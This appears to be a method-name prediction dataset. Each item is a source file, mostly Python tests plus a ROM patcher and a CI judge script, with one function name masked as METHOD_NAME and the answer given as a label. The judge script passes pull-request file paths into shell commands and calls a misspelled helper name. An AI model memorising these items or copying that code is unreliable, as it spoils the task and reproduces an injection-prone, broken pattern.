self.assertEqual(ret, torch.tensor([8, 8]))
# reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_timeout_in_python(self):
# Ensures timeouts are raised if we call rpc_async from within a
# torchscript function, but wait on the future in python.
if self.rank != 0:
return
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
args = (torch.tensor([1, 1]), torch.tensor([2, 2]))
kwargs = {
"first_kwarg": torch.tensor([2, 2]),
"second_kwarg": torch.tensor([3, 3]),
}
expected_error = self.get_timeout_error_regex()
fut = rpc_async_call_with_timeout_future_ret(dst_worker_name, args, kwargs, 0.5)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure timeout if we don't specify but the default is less than the
# RPC takes to execute.
rpc._set_rpc_timeout(0.001)
fut = rpc_async_call_future_ret(dst_worker_name, args, kwargs)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if zero timeout is specified
fut = rpc_async_call_with_timeout_future_ret(dst_worker_name, args, kwargs, 0)
result = fut.wait()
self.assertEqual(result, torch.tensor([8, 8]))
# reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def METHOD_NAME(self):
# Test that calling to_here() in JIT will raise timeout error if
# rpc.remote failed.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = f"worker{dst_rank}"
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
# Will ensure error handling callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Call to_here() within a ScriptFunction and ensure it raises
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref_to_here(rref)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout_in_jit(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = f"worker{dst_rank}"
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref_to_here_with_timeout(rref, 0.01)
rref_to_here_with_timeout(rref, 100)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_rref_timeout_pickle_in_jit(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = f"worker{dst_rank}"
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
# Will ensure error handling callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Call RPC with RRef arg in JIT, which will go through JIT pickling and
# ensure error is raised.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc_async_with_rref_arg(dst_worker, (rref, ))
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_rref_timeout_pickle_script_func(self):
# Similar to above test, but calls python rpc with script function.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = f"worker{dst_rank}"
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
# Will ensure error handling callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Call RPC with script function that takes RRef, ensure timeout during pickling
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc.rpc_sync(dst_worker, rref_to_here, args=(rref, )) | null |
upgrade marin | from ..assembler import ASM
def METHOD_NAME(rom):
# Show marin outside, even without a sword.
rom.patch(0x05, 0x0E78, ASM("ld a, [$DB4E]"), ASM("ld a, $01"), fill_nop=True)
    # Make Marin ignore the fact that you did not save Tarin yet, allowing you to get her song
rom.patch(0x05, 0x0E87, ASM("ld a, [$D808]"), ASM("ld a, $10"), fill_nop=True)
rom.patch(0x05, 0x0F73, ASM("ld a, [$D808]"), ASM("ld a, $10"), fill_nop=True)
rom.patch(0x05, 0x0FB0, ASM("ld a, [$DB48]"), ASM("ld a, $01"), fill_nop=True)
# Show marin in the animal village
rom.patch(0x03, 0x0A86, ASM("ld a, [$DB74]"), ASM("ld a, $01"), fill_nop=True)
rom.patch(0x05, 0x3F2E, ASM("ld a, [$DB74]"), ASM("ld a, $01"), fill_nop=True) # animal d0
rom.patch(0x15, 0x3F96, ASM("ld a, [$DB74]"), ASM("ld a, $01"), fill_nop=True) # animal d1
rom.patch(0x18, 0x11B0, ASM("ld a, [$DB74]"), ASM("ld a, $01"), fill_nop=True) # animal d2
# Instead of checking if we have the ballad, check if we have a specific room flag set
rom.patch(0x05, 0x0F89, ASM("""
ld a, [$DB49]
and $04
"""), ASM("""
ld a, [$D892]
and $10
"""), fill_nop=True)
rom.patch(0x05, 0x0FDF, ASM("""
ld a, [$DB49]
and $04
"""), ASM("""
ld a, [$D892]
and $10
"""), fill_nop=True)
rom.patch(0x05, 0x1042, ASM("""
ld a, [$DB49]
and $04
"""), ASM("""
ld a, [$D892]
and $10
"""), fill_nop=True)
# Patch that we call our specific handler instead of giving the song
rom.patch(0x05, 0x1170, ASM("""
ld hl, $DB49
set 2, [hl]
xor a
ld [$DB4A], a
"""), ASM("""
; Mark Marin as done.
ld a, [$D892]
or $10
ld [$D892], a
"""), fill_nop=True)
    # Show the right item instead of the ocarina
rom.patch(0x05, 0x11B3, ASM("""
ld de, $515F
xor a
ldh [$F1], a
jp $3C77
"""), ASM("""
ld a, $0C
rst 8
ret
"""), fill_nop=True)
# Patch the message that tells we got the song, to give the item and show the right message
rom.patch(0x05, 0x119C, ASM("""
ld a, $13
call $2385
"""), ASM("""
ld a, $0E
rst 8
"""), fill_nop=True)
def upgradeManbo(rom):
# Instead of checking if we have the song, check if we have a specific room flag set
rom.patch(0x18, 0x0536, ASM("""
ld a, [$DB49]
and $02
"""), ASM("""
ld a, [$DAFD]
and $20
"""), fill_nop=True)
    # Show the right item instead of the ocarina
rom.patch(0x18, 0x0786, ASM("""
ld de, $474D
xor a
ldh [$F1], a
jp $3C77
"""), ASM("""
ld a, $0C
rst 8
ret
"""), fill_nop=True)
# Patch to replace song giving to give the right item
rom.patch(0x18, 0x0757, ASM("""
ld a, $01
ld [$DB4A], a
ld hl, $DB49
set 1, [hl]
"""), ASM("""
; Mark Manbo as done.
ld hl, $DAFD
set 5, [hl]
; Show item message and give item
ld a, $0E
rst 8
"""), fill_nop=True)
# Remove the normal "got song message")
rom.patch(0x18, 0x076F, 0x0774, "", fill_nop=True)
def upgradeMamu(rom):
# Always allow the sign maze instead of only allowing the sign maze if you do not have song3
rom.patch(0x00, 0x2057, ASM("ld a, [$DB49]"), ASM("ld a, $00"), fill_nop=True)
# Patch the condition at which Mamu gives you the option to listen to him
rom.patch(0x18, 0x0031, ASM("""
ld a, [$DB49]
and $01
"""), ASM("""
ld a, [$DAFB] ; load room flag of the Mamu room
and $10
"""), fill_nop=True)
    # Show the right item instead of the ocarina
rom.patch(0x18, 0x0299, ASM("""
ld de, $474D
xor a
ldh [$F1], a
call $3C77
"""), ASM("""
ld a, $0C
rst 8
"""), fill_nop=True)
# Patch given an item
rom.patch(0x18, 0x0270, ASM("""
ld a, $02
ld [$DB4A], a
ld hl, $DB49
set 0, [hl]
"""), ASM("""
; Set the room complete flag.
ld hl, $DAFB
set 4, [hl]
"""), fill_nop=True)
# Patch to show the right message for the item
rom.patch(0x18, 0x0282, ASM("""
ld a, $DF
call $4087
"""), ASM("""
; Give item and message for room.
ld a, $0E
rst 8
"""), fill_nop=True) | null |
test read txt file | import datetime
import numpy as np
import RAiDER
from RAiDER.losreader import (
read_ESA_Orbit_file,
read_txt_file,
cut_times,
inc_hd_to_enu,
get_sv,
getZenithLookVecs,
Conventional,
Zenith,
)
from test import *
@pytest.fixture
def svs():
T = [
datetime.datetime(2018, 11, 12, 23, 0, 2),
datetime.datetime(2018, 11, 12, 23, 0, 12),
datetime.datetime(2018, 11, 12, 23, 0, 22),
datetime.datetime(2018, 11, 12, 23, 0, 32),
datetime.datetime(2018, 11, 12, 23, 0, 42),
datetime.datetime(2018, 11, 12, 23, 0, 52),
datetime.datetime(2018, 11, 12, 23, 1, 2),
datetime.datetime(2018, 11, 12, 23, 1, 12),
]
x = np.array([
-2064965.285362,
-2056228.553736,
-2047224.526705,
-2037955.293282,
-2028422.977002,
-2018629.735564,
-2008577.760461,
-1998269.276601,
])
y = np.array([
6434865.494987,
6460407.492520,
6485212.031660,
6509275.946120,
6532596.156540,
6555169.670917,
6576993.585012,
6598065.082739,
])
z = np.array([
2090670.967443,
2019650.417312,
1948401.684024,
1876932.818066,
1805251.894958,
1733367.014327,
1661286.298987,
1589017.893976,
])
vx = np.array([
860.239634,
887.072466,
913.698134,
940.113169,
966.314136,
992.297636,
1018.060311,
1043.598837,
])
vy = np.array([
2590.964968,
2517.380329,
2443.474728,
2369.256838,
2294.735374,
2219.919093,
2144.816789,
2069.437298,
])
vz = np.array([
-7090.378144,
-7113.598127,
-7136.014344,
-7157.624244,
-7178.425371,
-7198.415359,
-7217.591940,
-7235.952940,
])
return [T, x, y, z, vx, vy, vz]
def test_read_ESA_Orbit_file(svs):
true_svs = svs
filename = os.path.join(ORB_DIR, 'S1_orbit_example.EOF')
svs = read_ESA_Orbit_file(filename)
assert [np.allclose(
[(x-y).total_seconds() for x, y in zip(svs[0], true_svs[0])],
np.zeros(len(svs[0]))
)]
assert [np.allclose(s, ts) for s, ts in zip(svs[1:], true_svs[1:])]
def METHOD_NAME(svs):
true_svs = svs
filename = os.path.join(ORB_DIR, 'S1_sv_file.txt')
svs = read_txt_file(filename)
assert [np.allclose(
[(x-y).total_seconds() for x, y in zip(svs[0], true_svs[0])],
np.zeros(len(svs[0]))
)]
assert [np.allclose(s, ts) for s, ts in zip(svs[1:], true_svs[1:])]
def test_get_sv_1(svs, mocker):
true_svs = svs
filename = os.path.join(ORB_DIR, 'S1_orbit_example.EOF')
    # Ensures a non-standard file name for the orbit xml is not filtered out
mocker.patch('RAiDER.losreader.filter_ESA_orbit_file', side_effects=[True])
svs = get_sv(filename, true_svs[0][0], pad=3*60)
assert [np.allclose(
[(x-y).total_seconds() for x, y in zip(svs[0], true_svs[0])],
np.zeros(len(svs[0]))
)]
assert [np.allclose(s, ts) for s, ts in zip(svs[1:], true_svs[1:])]
assert RAiDER.losreader.filter_ESA_orbit_file.call_count == 1
def test_get_sv_2(svs):
true_svs = svs
filename = os.path.join(ORB_DIR, 'S1_sv_file.txt')
svs = get_sv(filename, true_svs[0][0], pad=3*60)
assert [np.allclose(
[(x-y).total_seconds() for x, y in zip(svs[0], true_svs[0])],
np.zeros(len(svs[0]))
)]
assert [np.allclose(s, ts) for s, ts in zip(svs[1:], true_svs[1:])]
def test_get_sv_3(svs):
true_svs = svs
filename = os.path.join(ORB_DIR, 'incorrect_file.txt')
with pytest.raises(ValueError):
get_sv(filename, true_svs[0][0], pad=3*60)
def test_get_sv_4(svs):
true_svs = svs
filename = os.path.join(ORB_DIR, 'no_exist.txt')
with pytest.raises(FileNotFoundError):
get_sv(filename, true_svs[0][0], pad=3*60)
def test_cut_times(svs):
true_svs = svs
assert all(cut_times(true_svs[0], true_svs[0][0], pad=3600*3))
def test_cut_times_2(svs):
true_svs = svs
assert sum(cut_times(true_svs[0], true_svs[0][0], pad=5)) == 1
def test_cut_times_3(svs):
true_svs = svs
assert np.sum(cut_times(true_svs[0], true_svs[0][4], pad=15)) == 3
def test_cut_times_4(svs):
true_svs = svs
assert np.sum(cut_times(true_svs[0], true_svs[0][0], pad=400)) == len(true_svs[0])
def test_los_to_lv():
with pytest.raises(ValueError):
inc_hd_to_enu(-10, 0)
def test_los_to_lv_2():
assert np.allclose(
inc_hd_to_enu(0, 0),
np.array([0, 0, 1])
)
def test_los_to_lv_3():
assert np.allclose(
inc_hd_to_enu(0, -180),
np.array([0, 0, 1])
)
def test_los_to_lv_3b():
assert np.allclose(
inc_hd_to_enu(0, 18),
np.array([0, 0, 1])
)
def test_los_to_lv_3c():
assert np.allclose(
inc_hd_to_enu(0, -18),
np.array([0, 0, 1])
)
def test_los_to_lv_4():
assert np.allclose(
inc_hd_to_enu(35, 0),
np.array([0, np.sin(np.radians(35)), np.cos(np.radians(35))])
)
def test_los_to_lv_5():
assert np.allclose(
inc_hd_to_enu(35, 180),
np.array([0, -np.sin(np.radians(35)), np.cos(np.radians(35))])
)
def test_los_to_lv_6():
assert np.allclose(
inc_hd_to_enu(35, 90),
np.array([-np.sin(np.radians(35)), 0, np.cos(np.radians(35))])
)
def test_zenith_1():
assert np.allclose(
getZenithLookVecs(np.array([0]), np.array([0]), np.array([0])),
np.array([1, 0, 0])
)
def test_zenith_2():
assert np.allclose(
getZenithLookVecs(np.array([90]), np.array([0]), np.array([0])),
np.array([0, 0, 1])
)
def test_zenith_3():
assert np.allclose(
getZenithLookVecs(np.array([-90]), np.array([0]), np.array([0])),
np.array([0, 0, -1])
)
def test_zenith_4():
assert np.allclose(
getZenithLookVecs(np.array([0]), np.array([180]), np.array([0])),
np.array([-1, 0, 0])
)
def test_zenith_5():
assert np.allclose(
getZenithLookVecs(np.array([0]), np.array([90]), np.array([0])),
np.array([0, 1, 0])
)
def test_zenith_6():
assert np.allclose(
getZenithLookVecs(np.array([0]), np.array([0]), np.array([1000])),
np.array([1, 0, 0])
)
def test_Zenith():
lats = np.array([-90, 0, 0, 90])
lons = np.array([-90, 0, 90, 180])
hgts = np.array([-10, 0, 10, 1000])
unit_vecs = np.array([[0,0,-1], [1,0,0], [0,1,0], [0,0,1]])
z = Zenith()
with pytest.raises(RuntimeError):
z.setPoints(lats=None)
z.setPoints(lats=lats, lons=lons, heights = hgts)
assert z._lats.shape == (4,)
assert z._lats.shape == z._lons.shape
assert np.allclose(z._heights, hgts)
output = z(unit_vecs)
assert output.shape == (4,3)
assert np.allclose(output, unit_vecs)
def test_Conventional():
lats = np.array([-90, 0, 0, 90])
lons = np.array([-90, 0, 90, 180])
hgts = np.array([-10, 0, 10, 1000])
c = Conventional()
with pytest.raises(ValueError):
c(np.ones(4))
c.setPoints(lats, lons, hgts)
with pytest.raises(ValueError):
c(np.ones(4)) | null |
test infer | # Copyright 2020-2023 OpenDR European Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import gc
import cv2
import shutil
import numpy as np
from opendr.perception.object_detection_2d import RetinaFaceLearner
from opendr.perception.object_detection_2d import WiderFaceDataset
import os
device = os.getenv('TEST_DEVICE') if os.getenv('TEST_DEVICE') else 'cpu'
def rmfile(path):
try:
os.remove(path)
except OSError as e:
print("Error: %s - %s." % (e.filename, e.strerror))
def rmdir(_dir):
try:
shutil.rmtree(_dir)
except OSError as e:
print("Error: %s - %s." % (e.filename, e.strerror))
class TestRetinaFaceLearner(unittest.TestCase):
@classmethod
def setUpClass(cls):
print("\n\n**********************************\nTEST RetinaFace Learner\n"
"**********************************")
cls.temp_dir = os.path.join("", "tests", "sources", "tools", "perception", "object_detection_2d",
"retinaface", "retinaface_temp")
cls.detector = RetinaFaceLearner(device=device, temp_path=cls.temp_dir, batch_size=1, epochs=1,
checkpoint_after_iter=0, lr=1e-4)
# Download all required files for testing
cls.detector.download(mode="pretrained")
cls.detector.download(mode="images")
cls.detector.download(mode="test_data")
@classmethod
def tearDownClass(cls):
print('Removing temporary directories for RetinaFace...')
# Clean up downloaded files
rmfile(os.path.join(cls.temp_dir, "cov4.jpg"))
rmdir(os.path.join(cls.temp_dir, "retinaface_resnet"))
rmdir(os.path.join(cls.temp_dir))
del cls.detector
gc.collect()
print('Finished cleaning for RetinaFace...')
def test_fit(self):
print('Starting training test for RetinaFace...')
training_dataset = WiderFaceDataset(root=self.temp_dir, splits=['train'])
m = list(self.detector._model.get_params()[0].values())[0].asnumpy().copy()
self.detector.fit(dataset=training_dataset, silent=True)
n = list(self.detector._model.get_params()[0].values())[0].asnumpy()
self.assertFalse(np.array_equal(m, n),
msg="Model parameters did not change after running fit.")
del training_dataset, m, n
gc.collect()
print('Finished training test for RetinaFace...')
def test_eval(self):
print('Starting evaluation test for RetinaFace...')
eval_dataset = WiderFaceDataset(root=self.temp_dir, splits=['train'])
self.detector.load(os.path.join(self.temp_dir, "retinaface_resnet"))
results_dict = self.detector.eval(eval_dataset, flip=False, pyramid=False)
self.assertIsNotNone(results_dict['recall'],
msg="Eval results dictionary not returned.")
del eval_dataset, results_dict
gc.collect()
print('Finished evaluation test for RetinaFace...')
def METHOD_NAME(self):
print('Starting inference test for RetinaFace...')
self.detector.load(os.path.join(self.temp_dir, "retinaface_resnet"))
img = cv2.imread(os.path.join(self.temp_dir, "cov4.jpg"))
self.assertIsNotNone(self.detector.infer(img),
msg="Returned empty BoundinBoxList.")
del img
gc.collect()
print('Finished inference test for RetinaFace...')
def test_save_load(self):
print('Starting save/load test for RetinaFace...')
self.detector.save(os.path.join(self.temp_dir, "test_model"))
self.detector._model = None
self.detector.load(os.path.join(self.temp_dir, "test_model"))
self.assertIsNotNone(self.detector._model, "model is None after loading model.")
# Cleanup
rmdir(os.path.join(self.temp_dir, "test_model"))
print('Finished save/load test for RetinaFace...')
if __name__ == "__main__":
unittest.main() | null |
test call functions | import numpy as np
from numba.core import types
from numba.cuda.testing import skip_on_cudasim, unittest, CUDATestCase
from numba import cuda
from numba.cuda import libdevice, compile_ptx
from numba.cuda.libdevicefuncs import functions, create_signature
def use_sincos(s, c, x):
i = cuda.grid(1)
if i < len(x):
sr, cr = libdevice.sincos(x[i])
s[i] = sr
c[i] = cr
def use_frexp(frac, exp, x):
i = cuda.grid(1)
if i < len(x):
fracr, expr = libdevice.frexp(x[i])
frac[i] = fracr
exp[i] = expr
def use_sad(r, x, y, z):
i = cuda.grid(1)
if i < len(x):
r[i] = libdevice.sad(x[i], y[i], z[i])
@skip_on_cudasim('Libdevice functions are not supported on cudasim')
class TestLibdevice(CUDATestCase):
"""
Some tests of libdevice function wrappers that check the returned values.
These are mainly to check that the generation of the implementations
results in correct typing and lowering for each type of function return
(e.g. scalar return, UniTuple return, Tuple return, etc.).
"""
def test_sincos(self):
# Tests return of a UniTuple from a libdevice function
arr = np.arange(100, dtype=np.float64)
sres = np.zeros_like(arr)
cres = np.zeros_like(arr)
cufunc = cuda.jit(use_sincos)
cufunc[4, 32](sres, cres, arr)
np.testing.assert_allclose(np.cos(arr), cres)
np.testing.assert_allclose(np.sin(arr), sres)
def test_frexp(self):
# Test return of a Tuple from a libdevice function
arr = np.linspace(start=1.0, stop=10.0, num=100, dtype=np.float64)
fracres = np.zeros_like(arr)
expres = np.zeros(shape=arr.shape, dtype=np.int32)
cufunc = cuda.jit(use_frexp)
cufunc[4, 32](fracres, expres, arr)
frac_expect, exp_expect = np.frexp(arr)
np.testing.assert_array_equal(frac_expect, fracres)
np.testing.assert_array_equal(exp_expect, expres)
def test_sad(self):
# Test return of a scalar from a libdevice function
x = np.arange(0, 200, 2)
y = np.arange(50, 150)
z = np.arange(15, 115)
r = np.zeros_like(x)
cufunc = cuda.jit(use_sad)
cufunc[4, 32](r, x, y, z)
np.testing.assert_array_equal(np.abs(x - y) + z, r)
# A template for generating tests of compiling calls to libdevice functions.
# The purpose of the call and assignment of the return variables is to ensure
# the actual function implementations are not thrown away resulting in a PTX
# implementation that only contains the ret instruction - this may hide certain
# errors.
function_template = """\
from numba.cuda import libdevice
def pyfunc(%(pyargs)s):
ret = libdevice.%(func)s(%(funcargs)s)
%(retvars)s = ret
"""
def make_test_call(libname):
"""
Generates a test function for each libdevice function.
"""
def METHOD_NAME(self):
# Strip off '__nv_' from libdevice name to get Python name
apiname = libname[5:]
apifunc = getattr(libdevice, apiname)
retty, args = functions[libname]
sig = create_signature(retty, args)
# Construct arguments to the libdevice function. These are all
# non-pointer arguments to the underlying bitcode function.
funcargs = ", ".join(['a%d' % i for i, arg in enumerate(args) if not
arg.is_ptr])
# Arguments to the Python function (`pyfunc` in the template above) are
# the arguments to the libdevice function, plus as many extra arguments
# as there are in the return type of the libdevice function - one for
# scalar-valued returns, or the length of the tuple for tuple-valued
# returns.
if isinstance(sig.return_type, (types.Tuple, types.UniTuple)):
# Start with the parameters for the return values
pyargs = ", ".join(['r%d' % i for i in
range(len(sig.return_type))])
# Add the parameters for the argument values
pyargs += ", " + funcargs
# Generate the unpacking of the return value from the libdevice
# function into the Python function return values (`r0`, `r1`,
# etc.).
retvars = ", ".join(['r%d[0]' % i for i in
range(len(sig.return_type))])
else:
# Scalar return is a more straightforward case
pyargs = "r0, " + funcargs
retvars = "r0[0]"
# Create the string containing the function to compile
d = { 'func': apiname,
'pyargs': pyargs,
'funcargs': funcargs,
'retvars': retvars }
code = function_template % d
# Convert the string to a Python function
locals = {}
exec(code, globals(), locals)
pyfunc = locals['pyfunc']
# Compute the signature for compilation. This mirrors the creation of
# arguments to the Python function above.
pyargs = [ arg.ty for arg in args if not arg.is_ptr ]
if isinstance(sig.return_type, (types.Tuple, types.UniTuple)):
pyreturns = [ret[::1] for ret in sig.return_type]
pyargs = pyreturns + pyargs
else:
pyargs.insert(0, sig.return_type[::1])
pyargs = tuple(pyargs)
ptx, resty = compile_ptx(pyfunc, pyargs)
# If the function body was discarded by optimization (therefore making
# the test a bit weak), there won't be any loading of parameters -
# ensure that a load from parameters occurs somewhere in the PTX
self.assertIn('ld.param', ptx)
# Returning the result (through a passed-in array) should also require
# a store to global memory, so check for at least one of those too.
self.assertIn('st.global', ptx)
return METHOD_NAME
@skip_on_cudasim('Compilation to PTX is not supported on cudasim')
class TestLibdeviceCompilation(unittest.TestCase):
"""
Class for holding all tests of compiling calls to libdevice functions. We
generate the actual tests in this class (as opposed to using subTest and
one test within this class) because there are a lot of tests, and it makes
the test suite appear frozen to test them all as subTests in one test.
"""
for libname in functions:
setattr(TestLibdeviceCompilation, 'test_%s' % libname,
make_test_call(libname))
if __name__ == '__main__':
unittest.main() | null |
compile test | import os
import sys
import subprocess
import argparse
from bs4 import BeautifulSoup as bs
import requests
EXTENSION = [("py", "python", "main"), ("cpp", "cpp", "main"), ("java", "java", "Main")]
def run(command):
ret = subprocess.check_output(command, shell=True).decode('utf8')
return ret
def load_arg():
parser = argparse.ArgumentParser()
arg = parser.add_argument
arg('--pr_number', type=int, help="Pull Request Number")
arg('--check_solution', action='store_true')
parser.set_defaults(check_solution=False)
return parser.parse_args()
def check_alreay_exist_solution(path):
if os.path.exists(path):
raise Exception("Alread Exists Solution")
print("It is a new Solution!!")
def get_pr_file(pr_number):
run(f"git fetch origin +refs/pull/{pr_number}/merge")
files = run(f"git --no-pager diff --name-only FETCH_HEAD $(git merge-base FETCH_HEAD main)")
files = [file.strip() for file in files.split() if file.strip() != ""]
if len(files) != 1:
raise Exception("No 1 PR 1 Solution")
return files[0]
def get_solution_language(path):
filename, extension = path.split('/')[-1].split('.')
for info in EXTENSION:
if info[0] == extension:
if filename == info[2]:
print(f"Found {info[1]} Language")
return info[1]
else:
raise Exception(f"Wrong File name {filename}")
raise Exception(f"No Found {extension} Language")
def detect_tab(path):
with open(path, 'r') as f:
solution = f.readlines()
f.close()
for line in solution:
if '\t' in line:
raise Exception("Detected Tab in this solution")
print("No Detect Tab")
def get_example(problem_id):
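    # Scrape the acmicpc.net problem page for its sample input/output pairs
    # and detect whether the problem uses a special judge (SPJ).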
url = f"https://www.acmicpc.net/problem/{problem_id}"
req = requests.get(url)
html = bs(req.text, 'html.parser')
spj = True if html.find('span', 'problem-label-spj') else False
if spj:
print("Found Special Judge")
examples = []
try:
sample_id = 1
while True:
sample_input = html.select(f'#sample-input-{sample_id}')[0].text
sample_output = html.select(f'#sample-output-{sample_id}')[0].text
examples.append((sample_input, sample_output))
sample_id += 1
except:
pass
return spj, examples
def METHOD_NAME(path):
try:
extension = get_solution_language(path)
if extension == 'cpp':
run(f"g++ -std=c++17 {path} -o Main")
elif extension == 'java':
run(f"javac {path} -d .")
except:
raise RuntimeError("Compile Error")
return extension
def judge_test(path):
detect_tab(path)
problem = path.split('/')[-2]
spj, samples = get_example(problem)
extension = METHOD_NAME(path)
print(f"Found {len(samples)} examples in {problem} problem")
for idx, (data_input, data_output) in enumerate(samples):
with open("example.in", 'w') as f:
f.write(data_input)
f.close()
try:
if extension == 'cpp':
result = run(f"./Main < example.in")
elif extension == 'python':
result = run(f"python3 {path} < example.in")
elif extension == 'java':
result = run(f"java Main < example.in")
except:
raise Exception("Runtime Error")
if spj:
continue
        result = [line.strip() for line in result.splitlines() if line.strip() != '']
        data_output = [line.strip() for line in data_output.splitlines() if line.strip() != '']
if result != data_output:
raise Exception("Wrong Solution")
print(f"Example {idx + 1} Correct !")
print(f"{problem} Judge Success")
if __name__ == "__main__":
args = load_arg()
if args.check_solution:
file = get_pr_file(args.pr_number)
lang = get_solution_language(file)
with open("result", 'w') as f:
f.write(lang)
f.close()
else:
file = get_pr_file(args.pr_number)
        check_already_exist_solution(file)
run(f"git checkout FETCH_HEAD")
judge_test(file) | null |
resource pathname | """macresource - Locate and open the resources needed for a script."""
from warnings import warnpy3k
warnpy3k("In 3.x, the macresource module is removed.", stacklevel=2)
from Carbon import Res
import os
import sys
import MacOS
import macostools
class ArgumentError(TypeError): pass
class ResourceFileNotFoundError(ImportError): pass
def need(restype, resid, filename=None, modname=None):
"""Open a resource file, if needed. restype and resid
are required parameters, and identify the resource for which to test. If it
is available we are done. If it is not available we look for a file filename
(default: modname with .rsrc appended) either in the same folder as
where modname was loaded from, or otherwise across sys.path.
Returns the refno of the resource file opened (or None)"""
if modname is None and filename is None:
raise ArgumentError, "Either filename or modname argument (or both) must be given"
if type(resid) is type(1):
try:
h = Res.GetResource(restype, resid)
except Res.Error:
pass
else:
return None
else:
try:
h = Res.GetNamedResource(restype, resid)
except Res.Error:
pass
else:
return None
# Construct a filename if we don't have one
if not filename:
if '.' in modname:
filename = modname.split('.')[-1] + '.rsrc'
else:
filename = modname + '.rsrc'
# Now create a list of folders to search
searchdirs = []
if modname == '__main__':
# If we're main we look in the current directory
searchdirs = [os.curdir]
if modname in sys.modules:
mod = sys.modules[modname]
if hasattr(mod, '__file__'):
searchdirs = [os.path.dirname(mod.__file__)]
searchdirs.extend(sys.path)
# And look for the file
for dir in searchdirs:
pathname = os.path.join(dir, filename)
if os.path.exists(pathname):
break
else:
raise ResourceFileNotFoundError, filename
refno = open_pathname(pathname)
# And check that the resource exists now
if type(resid) is type(1):
h = Res.GetResource(restype, resid)
else:
h = Res.GetNamedResource(restype, resid)
return refno
def open_pathname(pathname, verbose=0):
"""Open a resource file given by pathname, possibly decoding an
AppleSingle file"""
# No resource fork. We may be on OSX, and this may be either
# a data-fork based resource file or an AppleSingle file
# from the CVS repository.
try:
refno = Res.FSOpenResourceFile(pathname, u'', 1)
except Res.Error, arg:
if arg[0] != -199:
# -199 is "bad resource map"
raise
else:
return refno
# Finally try decoding an AppleSingle file
pathname = _decode(pathname, verbose=verbose)
    refno = Res.FSOpenResourceFile(pathname, u'', 1)
    return refno
def METHOD_NAME(pathname, verbose=0):
"""Return the pathname for a resource file (either DF or RF based).
If the pathname given already refers to such a file simply return it,
otherwise first decode it."""
# No resource fork. We may be on OSX, and this may be either
# a data-fork based resource file or an AppleSingle file
# from the CVS repository.
try:
refno = Res.FSOpenResourceFile(pathname, u'', 1)
except Res.Error, arg:
if arg[0] != -199:
# -199 is "bad resource map"
raise
else:
return refno
# Finally try decoding an AppleSingle file
pathname = _decode(pathname, verbose=verbose)
return pathname
def open_error_resource():
"""Open the resource file containing the error code to error message
mapping."""
need('Estr', 1, filename="errors.rsrc", modname=__name__)
def _decode(pathname, verbose=0):
# Decode an AppleSingle resource file, return the new pathname.
newpathname = pathname + '.df.rsrc'
if os.path.exists(newpathname) and \
os.stat(newpathname).st_mtime >= os.stat(pathname).st_mtime:
return newpathname
if hasattr(os, 'access') and not \
os.access(os.path.dirname(pathname), os.W_OK|os.X_OK):
# The destination directory isn't writeable. Create the file in
# a temporary directory
import tempfile
fd, newpathname = tempfile.mkstemp(".rsrc")
if verbose:
print 'Decoding', pathname, 'to', newpathname
import applesingle
applesingle.decode(pathname, newpathname, resonly=1)
return newpathname | null |
test edit record | # -*- coding: utf-8 -*-
#
# This file is part of CERN Analysis Preservation Framework.
# Copyright (C) 2017 CERN.
#
# CERN Analysis Preservation Framework is free software; you can redistribute
# it and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# CERN Analysis Preservation Framework is distributed in the hope that it will
# be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with CERN Analysis Preservation Framework; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Integration tests for record edit."""
###########################################
# api/deposits/{pid}/actions/edit [POST]
###########################################
def test_edit_record_owner_can_edit(client, users, auth_headers_for_user,
create_deposit):
owner = users['cms_user']
pid = create_deposit(owner, 'test', publish=True)['_deposit']['id']
resp = client.post('/deposits/{}/actions/edit'.format(pid),
headers=auth_headers_for_user(owner))
assert resp.status_code == 201
def test_edit_record_superuser_can_edit(client, users,
